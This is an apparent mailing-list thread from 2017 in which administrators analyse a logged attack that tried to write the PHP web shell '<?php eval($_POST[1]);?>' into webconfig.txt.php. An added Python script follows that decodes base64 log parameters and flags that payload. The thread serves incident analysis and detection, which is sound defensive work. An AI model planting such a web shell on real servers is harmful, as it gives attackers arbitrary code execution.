----- On Feb 6, 2017, at 6:32 PM, Bernd Lentes bernd.lentes@xxxxxxxxxxxxxxxxxxxxx wrote:

> ----- On Feb 6, 2017, at 5:54 PM, Jack Swan john.swan@xxxxxxxxxx wrote:
>
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>>
>> <?php eval($_POST[1]);?>
>>
>> I didn't decode the remaining lines. I think they're just trying to do the same
>> thing.
>
> You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
> helpful.

OK. I think I understand most of it.
First the attacker sets some values appropriate for him. Then he tries to create a file webconfig.txt.php and to write <?php eval($_POST[1]);?> in it.
Fortunately wwwrun can't write in /sr/www ... , following http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
If he could create the file, then he is able to send arbitrary stuff to it which is executed by eval.

Some things are still unclear to me:
What is the purpose of the two echos?
Why has the request status code 200?
What is the purpose of the 1 directly behind the question mark?
What is the 1 in the array $_POST? Arrays start with index 0, I think (I'm not a PHP developer).

Bernd
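Added example, not part of the original thread: a log check that does the decoding step discussed above automatically, base64-decoding long parameter values in access-log lines and flagging those that decode to the PHP strings quoted in the thread. It assumes the payload is visible in the logged request line (POST bodies need separate body logging); the sample lines, path, parameter name and the file-write pattern are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import quote, unquote

# Patterns for the decoded payload described in the thread; the file-write
# pattern is an added assumption about how such a file would be created.
INDICATORS = {
    "eval-of-request-data": re.compile(rb"eval\s*\(\s*\$_(POST|GET|REQUEST)", re.I),
    "webconfig.txt.php": re.compile(rb"webconfig\.txt\.php", re.I),
    "php-file-write": re.compile(rb"file_put_contents|fwrite\s*\(|fputs\s*\(", re.I),
}
# Runs of base64 alphabet long enough to carry code (24 chars = 18 bytes).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_candidates(line):
    """Yield the decoded bytes of every base64-looking run in a log line."""
    for token in B64_RUN.findall(unquote(line)):
        core = token.rstrip("=")
        core += "=" * (-len(core) % 4)  # restore padding lost in transit
        try:
            yield base64.b64decode(core, validate=True)
        except (binascii.Error, ValueError):
            continue  # long alphanumeric run that is not valid base64


def scan_line(line):
    """Return the sorted names of indicators found in decoded parameters."""
    found = set()
    for decoded in decode_candidates(line):
        found.update(n for n, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(found)


# Constructed sample: a stand-in containing only the strings quoted in the
# thread, not the real request. Path, parameter name and addresses are made up.
_STANDIN = base64.b64encode(b"webconfig.txt.php <?php eval($_POST[1]);?>").decode()
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2017:17:01:02 +0100] "GET /index.php?data='
    + quote(_STANDIN) + ' HTTP/1.1" 200 512',
    '198.51.100.9 - - [06/Feb/2017:17:01:05 +0100] "GET /img/logo.png HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        hits = scan_line(entry)
        if hits:
            print("SUSPICIOUS", hits, entry.split()[0])
```

A hit only shows that the request carried such a payload; whether the file was actually created still has to be checked on disk, since the request in the thread returned 200 even though the write failed.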